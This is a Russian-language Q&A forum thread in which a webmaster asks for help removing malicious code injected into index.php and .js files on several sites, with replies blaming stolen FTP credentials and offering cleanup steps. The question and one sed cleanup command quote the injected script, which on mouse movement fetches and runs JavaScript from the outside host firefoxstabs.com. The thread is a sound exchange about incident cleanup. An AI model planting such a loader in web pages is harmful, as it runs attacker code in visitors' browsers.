Задать вопрос
@smartlight

На сайте завелся вирус — помогите побороть

Доброго времени суток!
Есть у меня хостинг и на нем хостятся несколько сайтов — несколько на друпале и несколько на самописных CMS.

На праздниках заметил что не работает парочка их них — браузер писал об ошибке.
Полез смотреть на index.php.
Оказалось в конец index.php был дописан такой код:

_script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script

_script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script_


Полазив по директориям сайтов обнаружил что такой код дописан во все файлы .js и index.php.

Код из файлов я удалил, но в некоторые файлы он опять дописался.
Помогите разобраться, плз.
Доступа к ssh нету.
Есть доступ только к Директ админ и ФТП.

Заранее спасибо
  • Вопрос задан
  • 4874 просмотра
Подписаться 3 Оценить Комментировать
Пригласить эксперта
Ответы на вопрос 11
yakubovsky
@yakubovsky
Распространенная проблема. Троян у Вас на компе. Ворует пароль на фтп и потом подключается и дописывает свой код.
Сначала меняйте пароль через Директадмин на фтп акаунты, потом обращайтесь к тех. поддержке хостера. Они либо из бекапа вытянут файлы сайта либо почистят своими скриптами. У них есть самописные скрипты для выкусывания этой гадости. Каждый день с таким сталкиваются.
Ответ написан
Комментировать
Dennion
@Dennion
Разработчик PHPShop CMS.
Это что-то новенькое, уже с jQuery вставляют код вредоносный, обычно банальным iframe балуются. С лечением согласен, лечите дырку у себя. Еще удалите все письма с доступами из своей почты, часто от туда таскают. Как бы волна таких заражений была год назад и все производители софта обзавелись встроенным антивирусами для своих продуктов (CMS).
Ответ написан
Комментировать
@antivir
Если уж пользуетесь FTP, но не используйте клиенты типа Far и Total Commander для этого, оттуда аккаунты вынимаются — только в путь. Среди клиентов, шифрующих пароли, могу предложить FlashFXP (скорее всего есть бесплатные аналоги).
Ответ написан
@smartlight Автор вопроса
спасибо
Ответ написан
Комментировать
@Anatole
Это может быть и дыра в скриптах, а не троян на локальной машинке.
Ответ написан
Комментировать
@smartlight Автор вопроса
дело в том, что заражены были абсолютно все .js файлы, а вот .php файлы не все, а только выборочно.
Ответ написан
uadeveloper
@uadeveloper
У меня та же проблема, тоже на выходных. (Вова, это не ты?)
Вы случайно не FileZilla пользуетесь?

Есть инфо как вирус удалить? (NOD не видит в упор)
Ответ написан
Какие права доступа на те файлы которые заражены? Если у них стоит запись для всех — заражение скорее всего через уязвимостьв cms или скриптах на сайте (напимер широко известная дыра в phpmyadmin). Если записи для всех нет — ловите троянов на машине. И меняйте пароли. Я бы еще поискал по всем php на сайте base64_decode и eval — они обычно используются в вредоносных закладках.
Ответ написан
ValdikSS
@ValdikSS
grep -H 'firefoxstabs' ./ -R | cut -d: -f1 | xargs sed -i «s/document.write('<scr'+'ipt src=\»https:\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/1.5.1\/jquery.min.js\"><\/scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http:\/\/firefoxstabs.com\/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});//g"
grep -H 'firefoxstabs' ./ -R | cut -d: -f1 | xargs sed -i «s/
Ответ написан
@booblik
Пароли из вашего клиента, чем бы они не шифровались, можно отследить при попытке коннекта к серверу, например.

Меняйте пароль, лечитесь.

Если нет прав на запуск консольного решения, пользуйтесь вот этим php-скриптом. Мануал есть в комментах к коду: pastie.org/1881332/wrap
Ответ написан
Комментировать
deactivatedtheelephant
@deactivatedtheelephant
Я столкнулся с подобным вирусом на сайте клиента. Причем он был полиморфный!
Убил на гадость 4 часа времени, вычислял его «копии» и добавлял в скрипт который ходил по дереву и удалял. Где то 20-30 разных сигнатур получилось.
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы